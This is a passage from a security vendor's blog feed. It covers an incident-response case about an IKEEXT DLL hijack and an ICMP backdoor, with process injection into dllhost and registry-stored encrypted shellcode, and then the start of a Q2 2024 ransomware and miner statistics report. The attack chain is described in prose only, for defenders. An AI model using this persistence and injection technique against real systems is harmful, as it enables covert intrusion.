  1295. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113663" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-1024x181.png" alt="" width="1024" height="181" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-1024x181.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-300x53.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-768x135.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-1536x271.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-740x130.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-1588x280.png 1588w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-800x141.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05.png 1781w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1296. <p>The <em>ikeext.dll</em> library, in turn, is responsible for loading a DLL named <em>wlbsctrl.dll</em>, which is default Windows behavior. However, while the <em>svchost</em> service always runs on the system,<em> wlbsctrl.dll</em> does not exist in the file system by default, and this where threat actors saw an opportunity.</p>
  1297. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-113664" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06.png" alt="" width="607" height="700" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06.png 607w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06-260x300.png 260w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06-304x350.png 304w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06-243x280.png 243w" sizes="(max-width: 607px) 100vw, 607px" /></a></p>
  1298. <p>The threat actors created a malicious version of <em>wlbsctrl.dll</em> and saved it on the system. Based on Windows behavior, this DLL was executed every time without requiring registration in Autorun, which is commonly used for persistence.</p>
  1299. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113665" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-1024x469.png" alt="" width="1024" height="469" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-1024x469.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-300x137.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-768x352.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-1536x704.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-764x350.png 764w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-740x339.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-611x280.png 611w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-800x367.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07.png 1698w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1300. <p>Besides persistence, in the investigated incident the threat actor used the IKEEXT vulnerability to perform lateral movement via the SMB protocol and created a custom firewall rule named DLL Surrogate that permits <em>dllhost.exe</em> to listen on custom port 52415. All this was achieved by placing the backdoored <em>wlbsctrl.dll</em> into the system32 folder where the legitimate library is normally stored (if present on the system).</p>
  1301. <p>Later, the attacker implemented an ICMP backdoor. Once the backdoor was identified, Kaspersky verified and detected two more in-the-wild samples outside the customer&#8217;s infrastructure. All the discovered samples were similar except for the following points:</p>
  1302. <ul>
  1303. <li>Some differences in the PE header (normal behavior between similar samples);</li>
  1304. <li>Different mutex strings, all located at the same raw file offset;</li>
  1305. <li>Different bytes at the raw file offset 0x452–0x483, which are apparently useless (non-actionable) code.</li>
  1306. </ul>
  1307. <p>Based on GERT&#8217;s analysis, the backdoor acted like a loader, configured to execute the following activities:</p>
  1308. <ul>
  1309. <li>Check for the mutex; if it already exists in memory, terminate the process.</li>
  1310. <li>Attempt to read the file %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; decrypt its contents using the AES algorithm with a hardcoded KEY and a KEY derived from the volume serial number (VSN) of the C drive, then use it to set the value of the registry key &#8220;SOFTWARE\Classes\Interface {&lt;calculated_for_each_host&gt;}&#8221;, and then delete the file.</li>
  1311. <li>Load the contents of the default value of registry key &#8220;SOFTWARE\Classes\Interface {&lt;calculated_for_each_host&gt;}&#8221;, decrypt it again with AES using the same KEY described above, and invoke the payload shellcode.</li>
  1312. <li>Allocate the shellcode size in a new segment and jump to it.</li>
  1313. </ul>
  1314. <p>Note: The calculated REGKEY NAME (Interface {&lt;calculated_for_each_host&gt;}) is based on the VSN of the C drive (without host VSN it is not possible to decrypt correctly).</p>
  1315. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113666" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-1015x1024.png" alt="" width="1015" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-1015x1024.png 1015w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-297x300.png 297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-768x775.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-1522x1536.png 1522w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-347x350.png 347w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-740x747.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-277x280.png 277w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-800x807.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08.png 1653w" sizes="(max-width: 1015px) 100vw, 1015px" /></a></p>
  1316. <p>As part of the analysis, GERT identified a payload stored in the Windows registry and analyzed it, confirming the following behavior in the encrypted payload.</p>
  1317. <p>The decrypted payload has the header &#8220;CAFEBABE&#8221; (hex bytes magic related to Java Class files) followed by the shellcode size and finally the data. This payload executes the following commands:</p>
  1318. <ol>
  1319. <li>Decrypt itself (for the third time);</li>
  1320. <li>If not running under <em>exe</em>, create a suspended<em> dllhost</em> process with the parameter &#8220;/Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235}&#8221;, which refers to a COM+ system application service;</li>
  1321. <li>Allocate space to the new process;</li>
  1322. <li>Write a section of the decrypted payload (starting at offset 0x1A03, and having a size that&#8217;s contained in the small header at offset 0x19FF) into the new allocation;</li>
  1323. <li>Patch <em>dllhost</em> (in memory only) to ensure execution at the newly allocated space;</li>
  1324. <li>Resume the <em>dllhost</em> process.</li>
  1325. </ol>
  1326. <p>A new instance of the shellcode starts from step one. It finds that it is actually running under <em>dllhost</em>, decrypts a new section, executes it and listens on port 52415. The final payload injected into <em>dllhost.exe</em> appears to create a raw ICMP socket with no port. No outbound connection is made (although the received payload likely communicates outbound). Data is received from an unknown source in a Base64-encoded ICMP packet, converted to binary, decrypted, and executed via direct execution of data (allocating space using the VirtualAlloc function), copying shellcode to the allocated space, making a direct call to the allocated space.</p>
  1327. <p>According to our threat intelligence platforms, this threat has similarities to APT attacks: the attack Tactics, Techniques and Procedures (TTP) used are very similar to <a href="https://securelist.com/tag/toddycat/" target="_blank" rel="noopener">the ToddyCat actor</a>, but there&#8217;s no solid attribution to this group.</p>
  1328. <p>The objective of the threat actor was to gain persistence for monitoring and future impact, but no other objectives were confirmed based on the evidence obtained.</p>
  1329. <h3 id="mitre-attck-techniques">Mitre ATT&amp;CK techniques</h3>
  1330. <table width="100%">
  1331. <tbody>
  1332. <tr>
  1333. <td style="text-align: left" width="30%"><strong>Tactic</strong></td>
  1334. <td style="text-align: left" width="50%"><strong>Technique used </strong></td>
  1335. <td style="text-align: left" width="20%"><strong>Technique ID</strong></td>
  1336. </tr>
  1337. <tr>
  1338. <td>Resource Development</td>
  1339. <td>Develop Capabilities: Exploits</td>
  1340. <td>T1587.004</td>
  1341. </tr>
  1342. <tr>
  1343. <td>Resource Development</td>
  1344. <td>Develop Capabilities: Malware</td>
  1345. <td>T1587.001</td>
  1346. </tr>
  1347. <tr>
  1348. <td>Initial Access</td>
  1349. <td>Valid Accounts: Domain Accounts</td>
  1350. <td>T1078.002</td>
  1351. </tr>
  1352. <tr>
  1353. <td>Initial Access</td>
  1354. <td>Valid Accounts: Local Accounts</td>
  1355. <td>T1078.003</td>
  1356. </tr>
  1357. <tr>
  1358. <td>Execution</td>
  1359. <td>System Services: Service Execution</td>
  1360. <td>T1569.002</td>
  1361. </tr>
  1362. <tr>
  1363. <td>Execution</td>
  1364. <td>User Execution: Malicious File</td>
  1365. <td>T1204.002</td>
  1366. </tr>
  1367. <tr>
  1368. <td>Persistence</td>
  1369. <td>Create or Modify System Process: Windows Service</td>
  1370. <td>T1543.003</td>
  1371. </tr>
  1372. <tr>
  1373. <td>Persistence</td>
  1374. <td>Hijack Execution Flow: DLL Side-Loading</td>
  1375. <td>T1574.002</td>
  1376. </tr>
  1377. <tr>
  1378. <td>Persistence</td>
  1379. <td>Server Software Component: Web Shell</td>
  1380. <td>T1505.003</td>
  1381. </tr>
  1382. <tr>
  1383. <td>Persistence</td>
  1384. <td>Valid Accounts: Domain Accounts</td>
  1385. <td>T1078.002</td>
  1386. </tr>
  1387. <tr>
  1388. <td>Defense Evasion</td>
  1389. <td>Abuse Elevation Control Mechanism: Bypass User Account Control</td>
  1390. <td>T1548.002</td>
  1391. </tr>
  1392. <tr>
  1393. <td>Defense Evasion</td>
  1394. <td>Direct Volume Access</td>
  1395. <td>T1006</td>
  1396. </tr>
  1397. <tr>
  1398. <td>Defense Evasion</td>
  1399. <td>Modify Registry</td>
  1400. <td>T1112</td>
  1401. </tr>
  1402. <tr>
  1403. <td>Defense Evasion</td>
  1404. <td>Impair Defenses: Disable or Modify System Firewall</td>
  1405. <td>T1562.004</td>
  1406. </tr>
  1407. <tr>
  1408. <td>Defense Evasion</td>
  1409. <td>Impair Defenses: Disable Windows Event Logging</td>
  1410. <td>T1562.002</td>
  1411. </tr>
  1412. <tr>
  1413. <td>Defense Evasion</td>
  1414. <td>Indicator Removal: Clear Windows Event Logs</td>
  1415. <td>T1070.001</td>
  1416. </tr>
  1417. <tr>
  1418. <td>Defense Evasion</td>
  1419. <td>Indicator Removal: File Deletion</td>
  1420. <td>T1070.004</td>
  1421. </tr>
  1422. <tr>
  1423. <td>Defense Evasion</td>
  1424. <td>Impair Defenses: Impair Command History Logging</td>
  1425. <td>T1562.003</td>
  1426. </tr>
  1427. <tr>
  1428. <td>Command And Control</td>
  1429. <td>Non-Application Layer Protocol</td>
  1430. <td>T1095</td>
  1431. </tr>
  1432. </tbody>
  1433. </table>
  1434. <h2 id="conclusions">Conclusions</h2>
  1435. <p>Although statistics show the government sector was the most targeted vertical last year, it is clear that threat and crimeware actors do not care which vertical their potential targets belong to. To stay ahead of the attackers, the best course of action is to assess your asset inventory and continue to monitor and protect it.</p>
  1436. <p>The trend of cyberattacks and intrusions making use of infrastructure assets or legitimate on-premises applications creates the need to enable additional layers of monitoring based on threat intelligence. The implementation of MDR has been one of the recurring triggers for new investigations thanks to its detection capabilities and the ability of analysts to determine timely courses of action.</p>
  1437. <p>To learn more about our Incident Response report, we invite you to view the recording of the webinar <a href="https://securelist.com/webinars/analyzing-last-years-cyber-incident-cases/" target="_blank" rel="noopener">&#8220;Analyzing last year&#8217;s cyber incident cases&#8221;</a>.</p>
  1438. ]]></content:encoded>
  1439. <wfw:commentRss>https://securelist.com/incident-response-interesting-cases-2023/113611/feed/</wfw:commentRss>
  1440. <slash:comments>0</slash:comments>
  1441. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1.jpg" width="1600" height="1005"><media:keywords>full</media:keywords></media:content>
  1442. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  1443. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  1444. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1445. </item>
  1446. <item>
  1447. <title>IT threat evolution in Q2 2024. Non-mobile statistics</title>
  1448. <link>https://securelist.com/it-threat-evolution-q2-2024-pc-statistics/113683/</link>
  1449. <comments>https://securelist.com/it-threat-evolution-q2-2024-pc-statistics/113683/#respond</comments>
  1450. <dc:creator><![CDATA[AMR]]></dc:creator>
  1451. <pubDate>Tue, 03 Sep 2024 08:00:47 +0000</pubDate>
  1452. <category><![CDATA[Malware reports]]></category>
  1453. <category><![CDATA[Apple MacOS]]></category>
  1454. <category><![CDATA[Internet of Things]]></category>
  1455. <category><![CDATA[Malware]]></category>
  1456. <category><![CDATA[Malware Descriptions]]></category>
  1457. <category><![CDATA[Malware Statistics]]></category>
  1458. <category><![CDATA[Malware Technologies]]></category>
  1459. <category><![CDATA[Miner]]></category>
  1460. <category><![CDATA[Ransomware]]></category>
  1461. <category><![CDATA[Trojan]]></category>
  1462. <category><![CDATA[Secure environment (IoT)]]></category>
  1463. <category><![CDATA[Unix and macOS malware]]></category>
  1464. <category><![CDATA[Windows malware]]></category>
  1465. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113683</guid>
  1466.  
  1467. <description><![CDATA[This report presents statistics on PC threats for Q2 2024, including data on ransomware, miners, threats to macOS and IoT devices.]]></description>
  1468. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><em>The statistics presented here are based on detection verdicts by Kaspersky products and services received from users who consented to providing statistical data.</em></p>
  1469. <h2 id="quarterly-figures">Quarterly figures</h2>
  1470. <p>In Q2 2024:</p>
  1471. <ul>
  1472. <li>Kaspersky solutions blocked over 664 million attacks from various internet sources.</li>
  1473. <li>The web antivirus reacted to 113.5 million unique URLs.</li>
  1474. <li>The file antivirus blocked over 27 million malicious and unwanted objects.</li>
  1475. <li>Almost 86,000 users encountered ransomware attacks.</li>
  1476. <li>Nearly 12% of all ransomware victims whose data was published on DLSs (data leak sites) were affected by the Play ransomware group.</li>
  1477. <li>Nearly 340,000 users faced miner attacks.</li>
  1478. </ul>
  1479. <h2 id="ransomware">Ransomware</h2>
  1480. <h3 id="quarterly-trends-and-highlights">Quarterly trends and highlights</h3>
  1481. <h4 id="law-enforcement-successes">Law enforcement successes</h4>
  1482. <p>In April 2024, a criminal who developed a packer that was allegedly used by the Conti and Lockbit groups to evade antivirus detection was <a href="https://www.bleepingcomputer.com/news/security/police-arrest-conti-and-lockbit-ransomware-crypter-specialist/" target="_blank" rel="noopener">arrested</a> in Kyiv. According to Dutch police, the arrested individual was directly involved in at least one attack using the Conti ransomware in 2021. The criminal has already been charged.</p>
  1483. <p>In May, a member of the REvil group, arrested back in October 2021, was <a href="https://www.bleepingcomputer.com/news/security/revil-hacker-behind-kaseya-ransomware-attack-gets-13-years-in-prison/" target="_blank" rel="noopener">sentenced</a> to 13 years in prison and ordered to pay $16 million. The cybercriminal was involved in over 2,500 REvil attacks, resulting in more than $700 million in total damages.</p>
  1484. <p>In June, the FBI <a href="https://www.bleepingcomputer.com/news/security/fbi-recovers-7-000-lockbit-keys-urges-ransomware-victims-to-reach-out/" target="_blank" rel="noopener">announced</a> that it had obtained over 7,000 decryption keys for files encrypted by Lockbit ransomware attacks. The Bureau encourages victims to contact the Internet Crime Complaint Center (IC3) at ic3.gov.</p>
  1485. <p>According to the UK&#8217;s National Crime Agency (NCA) and the US Department of Justice, the Lockbit group amassed up to $1 billion in its attacks from June 2022 to February 2024.</p>
  1486. <h4 id="attacks-exploiting-vulnerabilities">Attacks exploiting vulnerabilities</h4>
  1487. <p>The<a href="https://www.cve.org/CVERecord?id=CVE-2024-26169" target="_blank" rel="noopener"> CVE-2024-26169</a> privilege escalation vulnerability, patched by Microsoft in March 2024, was likely exploited in attacks by the Black Basta group. Some evidence suggests that at the time of the exploitation, this vulnerability was still unpatched, making it a <a href="https://www.bleepingcomputer.com/news/security/black-basta-ransomware-gang-linked-to-windows-zero-day-attacks/" target="_blank" rel="noopener">zero-day vulnerability</a>.</p>
  1488. <p>In June 2024, a massive TellYouThePass ransomware attack was <a href="https://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-exploits-recent-php-rce-flaw-to-breach-servers/" target="_blank" rel="noopener">launched</a>, exploiting the <a href="https://www.cve.org/CVERecord?id=CVE-2024-4577" target="_blank" rel="noopener">CVE-2024-4577</a> vulnerability in PHP. This attack targeted Windows servers with certain PHP configurations, including those with the default XAMPP stack. The attackers scanned public IP address ranges and automatically infected vulnerable servers, demanding 0.1 BTC as ransom. Although this is a relatively small amount, the scale of the attacks could have yielded substantial profits. In recent years, this method has not been used as frequently due to its cost for attackers, who prefer instead targeted attacks with the hands-on involvement of operators. However, in this case, the attackers employed the time-tested approach.</p>
  1489. <h3 id="most-active-groups">Most active groups</h3>
  1490. <p>Here are the most active ransomware groups based on the number of victims added to their DLSs (data leak sites). In Q2 2024, the Play group was the most active, publishing data on 12% of all new ransomware victims. Cactus came in second (7.74%), followed by Ransom Hub (7.50%).</p>
  1491. <div class="js-infogram-embed" data-id="_/egUGQFKAlDFA1mMluAm8" data-type="interactive" data-title="01 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1492. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The percentage of victims of a particular group (according to its DLS) among victims of all groups published on all DLSs examined during the reporting period (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174308/it-threat-evolution-q2-2024-pc-statistics_en_01.png" target="_blank" rel="noopener">download</a>)</em></p>
  1493. <h3 id="number-of-new-modifications">Number of new modifications</h3>
  1494. <p>In Q2 2024, we discovered five new ransomware families and 4,456 new ransomware variants.</p>
  1495. <div class="js-infogram-embed" data-id="_/cSFUDQ7khuTMPTE6XDfp" data-type="interactive" data-title="02 EN-RU-ES q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1496. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of new ransomware modifications, Q2 2023 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174401/it-threat-evolution-q2-2024-pc-statistics_en_ru_es_02.png" target="_blank" rel="noopener">download</a>)</em></p>
  1497. <h3 id="number-of-users-attacked-by-ransomware-trojans">Number of users attacked by ransomware Trojans</h3>
  1498. <p>In Q2 2024, Kaspersky solutions protected 85,819 unique users from ransomware Trojans.</p>
  1499. <div class="js-infogram-embed" data-id="_/zbYzCpVpiWHHbihLNtHE" data-type="interactive" data-title="03 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1500. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of unique users attacked by ransomware Trojans, Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174435/it-threat-evolution-q2-2024-pc-statistics_en_03.png" target="_blank" rel="noopener">download</a>)</em></p>
  1501. <h3 id="geography-of-attacked-users">Geography of attacked users</h3>
  1502. <h4 id="top-10-countries-and-territories-targeted-by-ransomware-trojans">Top 10 countries and territories targeted by ransomware Trojans</h4>
  1503. <table width="100%">
  1504. <tbody>
  1505. <tr>
  1506. <td width="10%"></td>
  1507. <td width="50%"><strong>Country/territory*</strong></td>
  1508. <td width="40%"><strong>% of users attacked by ransomware**</strong></td>
  1509. </tr>
  1510. <tr>
  1511. <td>1</td>
  1512. <td>Pakistan</td>
  1513. <td>0.84%</td>
  1514. </tr>
  1515. <tr>
  1516. <td>2</td>
  1517. <td>South Korea</td>
  1518. <td>0.72%</td>
  1519. </tr>
  1520. <tr>
  1521. <td>3</td>
  1522. <td>Bangladesh</td>
  1523. <td>0.54%</td>
  1524. </tr>
  1525. <tr>
  1526. <td>4</td>
  1527. <td>China</td>
  1528. <td>0.53%</td>
  1529. </tr>
  1530. <tr>
  1531. <td>5</td>
  1532. <td>Iran</td>
  1533. <td>0.52%</td>
  1534. </tr>
  1535. <tr>
  1536. <td>6</td>
  1537. <td>Libya</td>
  1538. <td>0.51%</td>
  1539. </tr>
  1540. <tr>
  1541. <td>7</td>
  1542. <td>Tajikistan</td>
  1543. <td>0.50%</td>
  1544. </tr>
  1545. <tr>
  1546. <td>8</td>
  1547. <td>Mozambique</td>
  1548. <td>0.49%</td>
  1549. </tr>
  1550. <tr>
  1551. <td>9</td>
  1552. <td>Angola</td>
  1553. <td>0.41%</td>
  1554. </tr>
  1555. <tr>
  1556. <td>10</td>
  1557. <td>Rwanda</td>
  1558. <td>0.40%</td>
  1559. </tr>
  1560. </tbody>
  1561. </table>
  1562. <p>*Countries and territories with fewer than 50,000 Kaspersky users were excluded from the calculations.<br />
  1563. **Percentage of unique users whose computers were attacked by ransomware Trojans out of all unique Kaspersky product users in that country or territory.</p>
  1564. <h4 id="top-10-most-common-families-of-ransomware-trojans">Top 10 most common families of ransomware Trojans</h4>
  1565. <table width="100%">
  1566. <tbody>
  1567. <tr>
  1568. <td width="10%"></td>
  1569. <td width="25%"><strong>Name</strong></td>
  1570. <td width="40%"><strong>Verdicts*</strong></td>
  1571. <td width="25%"><strong>Share of attacked users**</strong></td>
  1572. </tr>
  1573. <tr>
  1574. <td>1</td>
  1575. <td>(generic verdict)</td>
  1576. <td>Trojan-Ransom.Win32.Gen</td>
  1577. <td>22.12%</td>
  1578. </tr>
  1579. <tr>
  1580. <td>2</td>
  1581. <td>WannaCry</td>
  1582. <td>Trojan-Ransom.Win32.Wanna</td>
  1583. <td>9.51%</td>
  1584. </tr>
  1585. <tr>
  1586. <td>3</td>
  1587. <td>(generic verdict)</td>
  1588. <td>Trojan-Ransom.Win32.Encoder</td>
  1589. <td>6.94%</td>
  1590. </tr>
  1591. <tr>
  1592. <td>4</td>
  1593. <td>(generic verdict)</td>
  1594. <td>Trojan-Ransom.Win32.Crypren</td>
  1595. <td>5.42%</td>
  1596. </tr>
  1597. <tr>
  1598. <td>5</td>
  1599. <td>Lockbit</td>
  1600. <td>Trojan-Ransom.Win32.Lockbit</td>
  1601. <td>4.71%</td>
  1602. </tr>
  1603. <tr>
  1604. <td>6</td>
  1605. <td>(generic verdict)</td>
  1606. <td>Trojan-Ransom.Win32.Agent</td>
  1607. <td>2.88%</td>
  1608. </tr>
  1609. <tr>
  1610. <td>7</td>
  1611. <td>PolyRansom/VirLock</td>
  1612. <td>Virus.Win32.PolyRansom / Trojan-Ransom.Win32.PolyRansom</td>
  1613. <td>2.80%</td>
  1614. </tr>
  1615. <tr>
  1616. <td>8</td>
  1617. <td>(generic verdict)</td>
  1618. <td>Trojan-Ransom.Win32.Phny</td>
  1619. <td>2.61%</td>
  1620. </tr>
  1621. <tr>
  1622. <td>9</td>
  1623. <td>(generic verdict)</td>
  1624. <td>Trojan-Ransom.Win32.Crypmod</td>
  1625. <td>2.58%</td>
  1626. </tr>
  1627. <tr>
  1628. <td>10</td>
  1629. <td>Stop/Djvu</td>
  1630. <td>Trojan-Ransom.Win32.Stop</td>
  1631. <td>2.11%</td>
  1632. </tr>
  1633. </tbody>
  1634. </table>
  1635. <p>*Statistics are based on detection verdicts by Kaspersky products. The information was provided by Kaspersky users who consented to providing statistical data.<br />
  1636. **Unique Kaspersky users attacked by the ransomware Trojan family as a percentage of total users attacked by ransomware Trojans.</p>
  1637. <h2 id="miners">Miners</h2>
  1638. <h3 id="number-of-new-modifications">Number of new modifications</h3>
  1639. <p>In Q2 2024, Kaspersky products detected 36,380 new miner variants.</p>
  1640. <div class="js-infogram-embed" data-id="_/40jPNzjmHQ6wNERxvsoN" data-type="interactive" data-title="04 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1641. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of new miner modifications, Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174538/it-threat-evolution-q2-2024-pc-statistics_en_04.png" target="_blank" rel="noopener">download</a>)</em></p>
  1642. <h3 id="number-of-users-attacked-by-miners">Number of users attacked by miners</h3>
  1643. <p>In Q2 2024, we detected attacks using miners on 339,850 unique Kaspersky users worldwide.</p>
  1644. <div class="js-infogram-embed" data-id="_/Al3zWO61bthWPjtHRfU3" data-type="interactive" data-title="05 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div>
  1645. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of unique users attacked by miners, Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174617/it-threat-evolution-q2-2024-pc-statistics_en_05.png" target="_blank" rel="noopener">download</a>)</em></p>
  1646. <h3 id="geography-of-attacked-users">Geography of attacked users</h3>
  1647. <h4 id="top-10-countries-and-territories-targeted-by-miners">Top 10 countries and territories targeted by miners</h4>
  1648. <table width="100%">
  1649. <tbody>
  1650. <tr>
  1651. <td width="10%"></td>
  1652. <td width="50%"><strong>Country/territory*</strong></td>
  1653. <td width="40%"><strong>% of users attacked by miners**</strong></td>
  1654. </tr>
  1655. <tr>
  1656. <td>1</td>
  1657. <td>Tajikistan</td>
  1658. <td>2.40%</td>
  1659. </tr>
  1660. <tr>
  1661. <td>2</td>
  1662. <td>Venezuela</td>
  1663. <td>1.90%</td>
  1664. </tr>
  1665. <tr>
  1666. <td>3</td>
  1667. <td>Kazakhstan</td>
  1668. <td>1.63%</td>
  1669. </tr>
  1670. <tr>
  1671. <td>4</td>
  1672. <td>Ethiopia</td>
  1673. <td>1.58%</td>
  1674. </tr>
  1675. <tr>
  1676. <td>5</td>
  1677. <td>Kyrgyzstan</td>
  1678. <td>1.49%</td>
  1679. </tr>
  1680. <tr>
  1681. <td>6</td>
  1682. <td>Belarus</td>
  1683. <td>1.48%</td>
  1684. </tr>
  1685. <tr>
  1686. <td>7</td>
  1687. <td>Uzbekistan</td>
  1688. <td>1.36%</td>
  1689. </tr>
  1690. <tr>
  1691. <td>8</td>
  1692. <td>Ukraine</td>
  1693. <td>1.05%</td>
  1694. </tr>
  1695. <tr>
  1696. <td>9</td>
  1697. <td>Panama</td>
  1698. <td>1.03%</td>
  1699. </tr>
  1700. <tr>
  1701. <td>10</td>
  1702. <td>Mozambique</td>
  1703. <td>1.01%</td>
  1704. </tr>
  1705. </tbody>
  1706. </table>
  1707. <p>*Countries and territories with fewer than 50,000 Kaspersky users were excluded from the calculations.<br />
  1708. **Percentage of unique users whose computers were attacked by miners out of all unique Kaspersky product users in that country or territory.</p>
  1709. <h2 id="attacks-on-macos">Attacks on macOS</h2>
